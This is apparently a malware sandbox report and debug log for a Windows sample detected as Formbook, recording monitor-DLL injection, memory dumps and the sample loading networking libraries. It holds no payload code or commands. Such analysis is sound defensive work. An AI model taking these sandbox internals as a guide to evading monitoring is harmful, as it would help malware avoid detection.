Detections

Yara: Formbook

Analysis

Category: FILE
Package: exe
Started: 2020-06-05 13:56:58
Completed: 2020-06-05 14:03:57
Duration: 419 seconds
route = tor
2020-05-13 09:08:22,211 [root] INFO: Date set to: 20200605T13:45:06, timeout set to: 200
2020-06-05 13:45:06,046 [root] DEBUG: Starting analyzer from: C:\tmpnwhtwc92
2020-06-05 13:45:06,046 [root] DEBUG: Storing results at: C:\IaUfpVzipc
2020-06-05 13:45:06,046 [root] DEBUG: Pipe server name: \\.\PIPE\iUhYvdtt
2020-06-05 13:45:06,046 [root] DEBUG: Python path: C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32
2020-06-05 13:45:06,046 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-06-05 13:45:06,046 [root] INFO: Automatically selected analysis package "exe"
2020-06-05 13:45:06,046 [root] DEBUG: Trying to import analysis package "exe"...
2020-06-05 13:45:06,093 [root] DEBUG: Imported analysis package "exe".
2020-06-05 13:45:06,093 [root] DEBUG: Trying to initialize analysis package "exe"...
2020-06-05 13:45:06,093 [root] DEBUG: Initialized analysis package "exe".
2020-06-05 13:45:06,218 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.browser"...
2020-06-05 13:45:06,218 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser".
2020-06-05 13:45:06,218 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.curtain"...
2020-06-05 13:45:06,421 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain".
2020-06-05 13:45:06,421 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.digisig"...
2020-06-05 13:45:06,687 [root] DEBUG: Imported auxiliary module "modules.auxiliary.digisig".
2020-06-05 13:45:06,703 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.disguise"...
2020-06-05 13:45:06,703 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise".
2020-06-05 13:45:06,703 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.human"...
2020-06-05 13:45:06,859 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human".
2020-06-05 13:45:06,859 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.procmon"...
2020-06-05 13:45:06,859 [root] DEBUG: Imported auxiliary module "modules.auxiliary.procmon".
2020-06-05 13:45:06,859 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.screenshots"...
2020-06-05 13:45:06,875 [modules.auxiliary.screenshots] DEBUG: Importing 'time'
2020-06-05 13:45:06,875 [modules.auxiliary.screenshots] DEBUG: Importing 'StringIO'
2020-06-05 13:45:06,875 [modules.auxiliary.screenshots] DEBUG: Importing 'Thread'
2020-06-05 13:45:06,875 [modules.auxiliary.screenshots] DEBUG: Importing 'Auxiliary'
2020-06-05 13:45:06,875 [modules.auxiliary.screenshots] DEBUG: Importing 'NetlogFile'
2020-06-05 13:45:06,875 [modules.auxiliary.screenshots] DEBUG: Importing 'Screenshot'
2020-06-05 13:45:06,953 [lib.api.screenshot] DEBUG: Importing 'math'
2020-06-05 13:45:06,953 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2020-06-05 13:45:12,265 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2020-06-05 13:45:12,312 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2020-06-05 13:45:12,343 [modules.auxiliary.screenshots] DEBUG: Imports OK
2020-06-05 13:45:12,343 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots".
2020-06-05 13:45:12,343 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.sysmon"...
2020-06-05 13:45:12,343 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon".
2020-06-05 13:45:12,343 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.usage"...
2020-06-05 13:45:12,359 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage".
2020-06-05 13:45:12,359 [root] DEBUG: Trying to initialize auxiliary module "Browser"...
2020-06-05 13:45:12,359 [root] DEBUG: Initialized auxiliary module "Browser".
2020-06-05 13:45:12,359 [root] DEBUG: Trying to start auxiliary module "Browser"...
2020-06-05 13:45:12,359 [root] DEBUG: Started auxiliary module Browser
2020-06-05 13:45:12,359 [root] DEBUG: Trying to initialize auxiliary module "Curtain"...
2020-06-05 13:45:12,359 [root] DEBUG: Initialized auxiliary module "Curtain".
2020-06-05 13:45:12,359 [root] DEBUG: Trying to start auxiliary module "Curtain"...
2020-06-05 13:45:12,359 [root] DEBUG: Started auxiliary module Curtain
2020-06-05 13:45:12,359 [root] DEBUG: Trying to initialize auxiliary module "DigiSig"...
2020-06-05 13:45:12,359 [root] DEBUG: Initialized auxiliary module "DigiSig".
2020-06-05 13:45:12,359 [root] DEBUG: Trying to start auxiliary module "DigiSig"...
2020-06-05 13:45:12,359 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature.
2020-06-05 13:45:12,687 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-06-05 13:45:12,687 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-06-05 13:45:12,718 [root] DEBUG: Started auxiliary module DigiSig
2020-06-05 13:45:12,718 [root] DEBUG: Trying to initialize auxiliary module "Disguise"...
2020-06-05 13:45:12,718 [root] DEBUG: Initialized auxiliary module "Disguise".
2020-06-05 13:45:12,718 [root] DEBUG: Trying to start auxiliary module "Disguise"...
2020-06-05 13:45:12,750 [root] DEBUG: Started auxiliary module Disguise
2020-06-05 13:45:12,750 [root] DEBUG: Trying to initialize auxiliary module "Human"...
2020-06-05 13:45:12,750 [root] DEBUG: Initialized auxiliary module "Human".
2020-06-05 13:45:12,750 [root] DEBUG: Trying to start auxiliary module "Human"...
2020-06-05 13:45:12,750 [root] DEBUG: Started auxiliary module Human
2020-06-05 13:45:12,750 [root] DEBUG: Trying to initialize auxiliary module "Procmon"...
2020-06-05 13:45:12,750 [root] DEBUG: Initialized auxiliary module "Procmon".
2020-06-05 13:45:12,750 [root] DEBUG: Trying to start auxiliary module "Procmon"...
2020-06-05 13:45:12,750 [root] DEBUG: Started auxiliary module Procmon
2020-06-05 13:45:12,750 [root] DEBUG: Trying to initialize auxiliary module "Screenshots"...
2020-06-05 13:45:12,750 [root] DEBUG: Initialized auxiliary module "Screenshots".
2020-06-05 13:45:12,750 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2020-06-05 13:45:12,765 [root] DEBUG: Started auxiliary module Screenshots
2020-06-05 13:45:12,765 [root] DEBUG: Trying to initialize auxiliary module "Sysmon"...
2020-06-05 13:45:12,765 [root] DEBUG: Initialized auxiliary module "Sysmon".
2020-06-05 13:45:12,765 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2020-06-05 13:45:12,765 [root] DEBUG: Started auxiliary module Sysmon
2020-06-05 13:45:12,765 [root] DEBUG: Trying to initialize auxiliary module "Usage"...
2020-06-05 13:45:12,765 [root] DEBUG: Initialized auxiliary module "Usage".
2020-06-05 13:45:12,765 [root] DEBUG: Trying to start auxiliary module "Usage"...
2020-06-05 13:45:12,765 [root] DEBUG: Started auxiliary module Usage
2020-06-05 13:45:12,765 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2020-06-05 13:45:12,765 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2020-06-05 13:45:12,765 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option
2020-06-05 13:45:12,765 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option
2020-06-05 13:45:12,875 [lib.api.process] INFO: Successfully executed process from path "C:\Users\Rebecca\AppData\Local\Temp\c6Dqqn8fjGAx.exe" with arguments "" with pid 5596
2020-06-05 13:45:12,875 [lib.api.process] INFO: Monitor config for process 5596: C:\tmpnwhtwc92\dll\5596.ini
2020-06-05 13:45:12,875 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpnwhtwc92\dll\lHJVtys.dll, loader C:\tmpnwhtwc92\bin\MRmOrrm.exe
2020-06-05 13:45:13,046 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\iUhYvdtt.
2020-06-05 13:45:13,046 [root] DEBUG: Loader: Injecting process 5596 (thread 5624) with C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:13,046 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:13,046 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:13,046 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 13:45:13,046 [root] DEBUG: Successfully injected DLL C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:13,062 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5596
2020-06-05 13:45:15,062 [lib.api.process] INFO: Successfully resumed process with pid 5596
2020-06-05 13:45:16,109 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-06-05 13:45:16,109 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-05 13:45:16,125 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-05 13:45:16,156 [root] INFO: loaded: b'5596'
2020-06-05 13:45:16,156 [root] INFO: Loaded monitor into process with pid 5596
2020-06-05 13:45:16,156 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:16,156 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:16,171 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:16,171 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:16,187 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xbc amd local view 0x02F10000 to global list.
2020-06-05 13:45:16,375 [root] DEBUG: DLL loaded at 0x74DB0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2020-06-05 13:45:16,375 [root] DEBUG: DLL loaded at 0x74DC0000: C:\Windows\system32\SXS (0x5f000 bytes).
2020-06-05 13:45:17,187 [root] DEBUG: DLL loaded at 0x6E160000: C:\Windows\system32\asycfilt (0x14000 bytes).
2020-06-05 13:45:17,625 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xec amd local view 0x033B0000 to global list.
2020-06-05 13:45:17,625 [root] DEBUG: DLL loaded at 0x74880000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-06-05 13:45:17,640 [root] DEBUG: DLL loaded at 0x74610000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-06-05 13:45:17,671 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xf8 amd local view 0x032E0000 to global list.
2020-06-05 13:45:18,484 [root] DEBUG: DLL loaded at 0x74330000: C:\Windows\system32\VERSION (0x9000 bytes).
2020-06-05 13:45:18,484 [root] DEBUG: DLL unloaded from 0x00400000.
2020-06-05 13:45:27,375 [root] DEBUG: set_caller_info: Adding region at 0x003D0000 to caller regions list (ntdll::LdrLoadDll).
2020-06-05 13:45:27,453 [root] DEBUG: set_caller_info: Adding region at 0x01300000 to caller regions list (kernel32::GetSystemTime).
2020-06-05 13:45:27,468 [root] DEBUG: DumpMemory: Exception occured reading memory address 0x1300000
2020-06-05 13:45:27,468 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5596_11332322842725135562020', b'9;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?0x01300000;?', ['5596'], 'CAPE')
2020-06-05 13:45:27,515 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\IaUfpVzipc\CAPE\5596_11332322842725135562020 (size 0xfe8)
2020-06-05 13:45:27,515 [root] DEBUG: DumpRegion: Dumped stack region from 0x01300000, size 0x1000.
2020-06-05 13:45:27,531 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5596_15924564372725135562020', b'9;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?0x003D0000;?', ['5596'], 'CAPE')
2020-06-05 13:45:27,546 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\IaUfpVzipc\CAPE\5596_15924564372725135562020 (size 0x32ef)
2020-06-05 13:45:27,546 [root] DEBUG: DumpRegion: Dumped stack region from 0x003D0000, size 0x8000.
2020-06-05 13:45:29,937 [root] INFO: Announced 32-bit process name: c6Dqqn8fjGAx.exe pid: 5848
2020-06-05 13:45:29,937 [lib.api.process] INFO: Monitor config for process 5848: C:\tmpnwhtwc92\dll\5848.ini
2020-06-05 13:45:29,953 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpnwhtwc92\dll\lHJVtys.dll, loader C:\tmpnwhtwc92\bin\MRmOrrm.exe
2020-06-05 13:45:29,968 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\iUhYvdtt.
2020-06-05 13:45:29,968 [root] DEBUG: Loader: Injecting process 5848 (thread 5904) with C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:29,968 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:29,968 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:29,984 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 13:45:29,984 [root] DEBUG: Successfully injected DLL C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:29,984 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5848
2020-06-05 13:45:30,015 [root] INFO: Announced 32-bit process name: c6Dqqn8fjGAx.exe pid: 5848
2020-06-05 13:45:30,015 [lib.api.process] INFO: Monitor config for process 5848: C:\tmpnwhtwc92\dll\5848.ini
2020-06-05 13:45:30,015 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpnwhtwc92\dll\lHJVtys.dll, loader C:\tmpnwhtwc92\bin\MRmOrrm.exe
2020-06-05 13:45:30,031 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\iUhYvdtt.
2020-06-05 13:45:30,031 [root] DEBUG: Loader: Injecting process 5848 (thread 5904) with C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,031 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:30,031 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,031 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-05 13:45:30,046 [root] DEBUG: Successfully injected DLL C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,046 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5848
2020-06-05 13:45:30,046 [root] INFO: Announced 32-bit process name: c6Dqqn8fjGAx.exe pid: 5848
2020-06-05 13:45:30,046 [lib.api.process] INFO: Monitor config for process 5848: C:\tmpnwhtwc92\dll\5848.ini
2020-06-05 13:45:30,046 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpnwhtwc92\dll\lHJVtys.dll, loader C:\tmpnwhtwc92\bin\MRmOrrm.exe
2020-06-05 13:45:30,062 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\iUhYvdtt.
2020-06-05 13:45:30,062 [root] DEBUG: Loader: Injecting process 5848 (thread 0) with C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,062 [root] DEBUG: Error 0 (0x0) - GetProcessInitialThreadId: Remote PEB 0x7FFDF000 Local PEB 0x7FFDF000 Local TEB 0x7FFDC000: The operation completed successfully.
2020-06-05 13:45:30,062 [root] DEBUG: Error 299 (0x12b) - GetProcessInitialThreadId: Failed to read from process: Only part of a ReadProcessMemory or WriteProcessMemory request was completed.
2020-06-05 13:45:30,062 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed (SessionId=1).
2020-06-05 13:45:30,062 [root] DEBUG: Failed to inject DLL C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,078 [lib.api.process] ERROR: Unable to inject into 32-bit process with pid 5848, error: 4294967281
2020-06-05 13:45:30,078 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5596_10994882302026135562020', b'4;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?5848;?', ['5596'], 'CAPE')
2020-06-05 13:45:30,093 [root] INFO: Announced 32-bit process name: c6Dqqn8fjGAx.exe pid: 5848
2020-06-05 13:45:30,093 [lib.api.process] INFO: Monitor config for process 5848: C:\tmpnwhtwc92\dll\5848.ini
2020-06-05 13:45:30,093 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpnwhtwc92\dll\lHJVtys.dll, loader C:\tmpnwhtwc92\bin\MRmOrrm.exe
2020-06-05 13:45:30,109 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\iUhYvdtt.
2020-06-05 13:45:30,109 [root] DEBUG: Loader: Injecting process 5848 (thread 0) with C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,109 [root] DEBUG: Error 0 (0x0) - GetProcessInitialThreadId: Remote PEB 0x7FFDF000 Local PEB 0x7FFDE000 Local TEB 0x7FFDF000: The operation completed successfully.
2020-06-05 13:45:30,109 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 5904, handle 0xa4
2020-06-05 13:45:30,109 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:30,109 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x004014C8)
2020-06-05 13:45:30,109 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,125 [root] DEBUG: InjectDllViaIAT: Memory region at 0x07000000 not empty.
2020-06-05 13:45:30,125 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 13:45:30,125 [root] DEBUG: Successfully injected DLL C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,125 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5848
2020-06-05 13:45:30,125 [root] INFO: Announced 32-bit process name: c6Dqqn8fjGAx.exe pid: 5848
2020-06-05 13:45:30,125 [lib.api.process] INFO: Monitor config for process 5848: C:\tmpnwhtwc92\dll\5848.ini
2020-06-05 13:45:30,125 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpnwhtwc92\dll\lHJVtys.dll, loader C:\tmpnwhtwc92\bin\MRmOrrm.exe
2020-06-05 13:45:30,140 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\iUhYvdtt.
2020-06-05 13:45:30,140 [root] DEBUG: Loader: Injecting process 5848 (thread 5904) with C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,140 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:30,140 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x004014C8)
2020-06-05 13:45:30,140 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,140 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-05 13:45:30,140 [root] DEBUG: Successfully injected DLL C:\tmpnwhtwc92\dll\lHJVtys.dll.
2020-06-05 13:45:30,140 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5848
2020-06-05 13:45:30,156 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5596_16872639682026135562020', b'3;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?5848;?', ['5596'], 'CAPE')
2020-06-05 13:45:30,249 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5596_8601623262026135562020', b'3;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?5848;?', ['5596'], 'CAPE')
2020-06-05 13:45:30,359 [root] WARNING: Unable to open termination event for pid 5596.
2020-06-05 13:45:30,375 [root] INFO: ('dump_file', 'C:\\Users\\Rebecca\\AppData\\Local\\Temp\\~DFF51EEFB66773FEBB.TMP', '', False, 'files')
2020-06-05 13:45:30,375 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-06-05 13:45:30,375 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-05 13:45:30,390 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:30,390 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-05 13:45:30,406 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 5848 at 0x6a6b0000, image base 0x400000, stack from 0x126000-0x130000
2020-06-05 13:45:30,406 [root] DEBUG: Commandline: C:\Users\Rebecca\AppData\Local\Temp\"C:\Users\Rebecca\AppData\Local\Temp\c6Dqqn8fjGAx.exe".
2020-06-05 13:45:30,421 [root] INFO: loaded: b'5848'
2020-06-05 13:45:30,421 [root] INFO: Loaded monitor into process with pid 5848
2020-06-05 13:45:30,437 [root] INFO: b'C:\\IaUfpVzipc\\CAPE\\5596_12090969882026135562020|5596|0;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?'
2020-06-05 13:45:30,437 [root] INFO: cape
2020-06-05 13:45:30,437 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5596_12090969882026135562020', b'0;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?', ['5596'], 'procdump')
2020-06-05 13:45:30,437 [root] DEBUG: set_caller_info: Adding region at 0x00150000 to caller regions list (ntdll::LdrLoadDll).
2020-06-05 13:45:30,453 [root] DEBUG: set_caller_info: Adding region at 0x01490000 to caller regions list (kernel32::GetSystemTime).
2020-06-05 13:45:30,453 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5596_12090969882026135562020', '', False, 'files')
2020-06-05 13:45:30,453 [root] DEBUG: DLL loaded at 0x74DB0000: C:\Windows\system32\cryptbase (0xc000 bytes).
2020-06-05 13:45:30,468 [root] DEBUG: DumpMemory: Exception occured reading memory address 0x1490000
2020-06-05 13:45:30,500 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x01490000 size 0x400000.
2020-06-05 13:45:30,546 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5848_9172732243025135562020', b'9;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?0x01490000;?', ['5848'], 'CAPE')
2020-06-05 13:45:30,578 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\IaUfpVzipc\CAPE\5848_9172732243025135562020 (size 0x5c8)
2020-06-05 13:45:30,578 [root] DEBUG: DumpRegion: Dumped stack region from 0x01490000, size 0x1000.
2020-06-05 13:45:30,578 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5848_1546327143025135562020', b'9;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?0x00150000;?', ['5848'], 'CAPE')
2020-06-05 13:45:30,609 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\IaUfpVzipc\CAPE\5848_1546327143025135562020 (size 0x32ef)
2020-06-05 13:45:30,609 [root] DEBUG: DumpRegion: Dumped stack region from 0x00150000, size 0x100000.
2020-06-05 13:45:31,703 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xbc amd local view 0x753D0000 to global list.
2020-06-05 13:45:31,703 [root] DEBUG: DLL loaded at 0x753D0000: C:\Windows\system32\shell32 (0xc4c000 bytes).
2020-06-05 13:45:31,921 [root] DEBUG: DLL loaded at 0x76160000: C:\Windows\system32\wininet (0x1c4000 bytes).
2020-06-05 13:45:31,953 [root] DEBUG: DLL loaded at 0x751C0000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2020-06-05 13:45:31,953 [root] DEBUG: DLL loaded at 0x74FF0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2020-06-05 13:45:31,953 [root] DEBUG: DLL loaded at 0x75010000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2020-06-05 13:45:31,968 [root] DEBUG: DLL loaded at 0x74330000: C:\Windows\system32\version (0x9000 bytes).
2020-06-05 13:45:31,968 [root] DEBUG: DLL loaded at 0x75000000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2020-06-05 13:45:31,984 [root] DEBUG: DLL loaded at 0x76AA0000: C:\Windows\system32\normaliz (0x3000 bytes).
2020-06-05 13:45:31,984 [root] DEBUG: DLL loaded at 0x767A0000: C:\Windows\system32\iertutil (0x215000 bytes).
2020-06-05 13:45:31,984 [root] DEBUG: DLL loaded at 0x74FE0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2020-06-05 13:45:32,000 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\system32\Secur32 (0x8000 bytes).
2020-06-05 13:45:32,015 [root] DEBUG: DLL loaded at 0x74E60000: C:\Windows\system32\profapi (0xb000 bytes).
2020-06-05 13:45:32,015 [root] DEBUG: DLL loaded at 0x70E20000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2020-06-05 13:45:32,031 [root] DEBUG: DLL loaded at 0x74F70000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2020-06-05 13:45:32,046 [root] DEBUG: DLL loaded at 0x76480000: C:\Windows\system32\WS2_32 (0x35000 bytes).
2020-06-05 13:45:32,046 [root] DEBUG: DLL loaded at 0x76120000: C:\Windows\system32\NSI (0x6000 bytes).
2020-06-05 13:45:32,062 [root] DEBUG: DLL loaded at 0x6EB20000: C:\Windows\system32\winhttp (0x58000 bytes).
2020-06-05 13:45:32,078 [root] DEBUG: DLL loaded at 0x6EAA0000: C:\Windows\system32\webio (0x50000 bytes).
2020-06-05 13:45:32,078 [root] DEBUG: DLL unloaded from 0x6EB20000.
2020-06-05 13:45:32,093 [root] DEBUG: DLL loaded at 0x73320000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2020-06-05 13:45:32,093 [root] DEBUG: DLL loaded at 0x73310000: C:\Windows\system32\WINNSI (0x7000 bytes).
2020-06-05 13:45:32,109 [root] DEBUG: DLL loaded at 0x74840000: C:\Windows\system32\mswsock (0x3c000 bytes).
2020-06-05 13:45:32,125 [root] DEBUG: DLL loaded at 0x69A90000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0 (0x4000 bytes).
2020-06-05 13:45:32,125 [root] DEBUG: DLL loaded at 0x74700000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2020-06-05 13:45:32,140 [root] DEBUG: DLL loaded at 0x74830000: C:\Windows\System32\wship6 (0x6000 bytes).
2020-06-05 13:45:32,140 [root] DEBUG: DLL loaded at 0x76B50000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2020-06-05 13:45:32,156 [root] DEBUG: DLL loaded at 0x70370000: C:\Windows\System32\netprofm (0x5a000 bytes).
2020-06-05 13:45:32,156 [root] DEBUG: DLL loaded at 0x735C0000: C:\Windows\System32\nlaapi (0x10000 bytes).
2020-06-05 13:45:32,171 [root] DEBUG: DLL loaded at 0x730B0000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2020-06-05 13:45:32,171 [root] DEBUG: DLL loaded at 0x743C0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-06-05 13:45:32,187 [root] DEBUG: DLL loaded at 0x76CE0000: C:\Windows\system32\urlmon (0x124000 bytes).
2020-06-05 13:45:32,187 [root] DEBUG: DLL loaded at 0x73030000: C:\Windows\system32\dhcpcsvc (0x12000 bytes).
2020-06-05 13:45:32,187 [root] DEBUG: DLL loaded at 0x71530000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2020-06-05 13:45:32,203 [root] DEBUG: DLL loaded at 0x74880000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-06-05 13:45:32,218 [root] DEBUG: DLL loaded at 0x74610000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-06-05 13:45:32,218 [root] DEBUG: DLL loaded at 0x74E50000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2020-06-05 13:45:32,281 [root] DEBUG: DLL loaded at 0x6D670000: C:\Windows\System32\npmproxy (0x8000 bytes).
